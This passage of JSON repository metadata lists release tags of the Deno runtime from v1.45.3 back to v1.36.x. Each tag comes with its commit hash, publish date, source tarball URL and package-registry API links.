ha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a